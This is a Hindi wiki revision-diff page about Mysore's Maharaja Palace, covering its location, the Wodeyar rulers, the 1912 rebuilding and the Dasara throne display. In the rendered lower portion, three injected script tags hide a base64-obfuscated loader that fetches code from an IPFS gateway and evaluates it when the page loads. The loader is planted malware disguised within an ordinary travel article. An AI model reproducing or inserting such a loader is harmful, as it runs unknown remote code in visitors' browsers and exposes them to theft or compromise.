Difference between revisions of "महाराजा पैलेस मैसूर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*मैसूर महल कर्नाटक के मैसूर शहर मे स्थित है। *मैसू...' के साथ नया पन्ना बनाया)
 
 
(13 intermediate revisions by 5 users not shown)
Line 1: Line 1:
*मैसूर महल [[कर्नाटक]] के [[मैसूर]] शहर मे स्थित है।
+
[[चित्र:Mysore-Palace-2.jpg|thumb|250px|[[मैसूर]] का महाराजा पैलेस<br /> Mysore's Maharaja Palace]]
*मैसूर महल [[मैसूर]] में आकर्षण का सबसे बड़ा केंद्र है।  
+
'''महाराजा पैलेस''' [[कर्नाटक]] के [[मैसूर]] शहर में स्थित यहाँ के आकर्षण का सबसे बड़ा केंद्र है।  
*मैसूर महल मिर्जा रोड पर स्थित [[भारत]] के सबसे बड़े महलों में से एक है।  
+
*महाराजा पैलेस मिर्जा रोड पर स्थित [[भारत]] के सबसे बड़े महलों में से एक है।  
*मैसूर महल में मैसूर राज्य के वुडेयार महाराज रहते थे।  
+
*महाराजा पैलेस में मैसूर राज्य के वुडेयार महाराज रहते थे।  
*इस महल की देखरख अब पुरातत्व विभाग करता है।
+
*महाराजा पैलेस की देखरेख अब [[पुरातत्त्व]] विभाग करता है।
 +
*इस महल की ख़ासियत है इस महल की कल्याण मंडप की काँच से बनी छत, दीवारों पर लगी तस्वीरें और स्वर्णिम सिंहासन।
 
*जब लकड़ी का महल जल गया था, तब इस महल का निर्माण कराया गया।  
 
*जब लकड़ी का महल जल गया था, तब इस महल का निर्माण कराया गया।  
 
*[[1912]] में बने इस महल का नक्शा ब्रिटिश के हेनरी इर्विन ने बनाया था।  
 
*[[1912]] में बने इस महल का नक्शा ब्रिटिश के हेनरी इर्विन ने बनाया था।  
*बहुमूल्य [[रत्न|रत्नों]] से सजे इस सिंहासन को दशहरे के दौरान जनता के देखने के लिए रखा जाता है।  
+
*बहुमूल्य [[रत्न|रत्नों]] से सजे इस सिंहासन को [[दशहरा|दशहरे]] के दौरान जनता के देखने के लिए रखा जाता है।  
*इस महल की खासियत है इस महल की कल्याण मंडप की काँच से बनी छत, दीवारों पर लगी तस्वीरें और स्वर्णिम सिंहासन।
 
  
 
{{लेख प्रगति
 
{{लेख प्रगति
Line 16: Line 16:
 
|शोध=
 
|शोध=
 
}}
 
}}
 +
==वीथिका==
 +
<gallery>
 +
चित्र:Mysore-Palace-1.jpg|[[मैसूर]] का महाराजा पैलेस
 +
चित्र:Mysore-Palace.jpg|महाराजा पैलेस, [[मैसूर]]
 +
चित्र:Mysore-Palace-3.jpg|महाराजा पैलेस, [[मैसूर]]
 +
चित्र:Mysore-Palace-4.jpg|महाराजा पैलेस, [[मैसूर]]
 +
चित्र:Mysore-Palace-5.jpg|महाराजा पैलेस, [[मैसूर]]
 +
चित्र:Mysore-Palace-6.jpg|महाराजा पैलेस, [[मैसूर]]
 +
चित्र:Mysore-Palace-7.jpg|महाराजा पैलेस, [[मैसूर]]
 +
चित्र:Mysore-Palace-8.jpg|महाराजा पैलेस, [[मैसूर]]
 +
</gallery>
 +
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 +
==संबंधित लेख==
 +
{{कर्नाटक के पर्यटन स्थल}}
 
[[Category:कर्नाटक]]
 
[[Category:कर्नाटक]]
 
[[Category:कर्नाटक के पर्यटन स्थल]]
 
[[Category:कर्नाटक के पर्यटन स्थल]]

Latest revision as of 07:36, 1 February 2012

[[chitr:Mysore-Palace-2.jpg|thumb|250px|maisoor ka maharaja pailes
Mysore's Maharaja Palace]] maharaja pailes karnatak ke maisoor shahar mean sthit yahaan ke akarshan ka sabase b da keandr hai.

  • maharaja pailes mirja rod par sthit bharat ke sabase b de mahaloan mean se ek hai.
  • maharaja pailes mean maisoor rajy ke vudeyar maharaj rahate the.
  • maharaja pailes ki dekharekh ab puratattv vibhag karata hai.
  • is mahal ki khasiyat hai is mahal ki kalyan mandap ki kaanch se bani chhat, divaroan par lagi tasvirean aur svarnim sianhasan.
  • jab lak di ka mahal jal gaya tha, tab is mahal ka nirman karaya gaya.
  • 1912 mean bane is mahal ka naksha british ke henari irvin ne banaya tha.
  • bahumooly ratnoan se saje is sianhasan ko dashahare ke dauran janata ke dekhane ke lie rakha jata hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

vithika

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>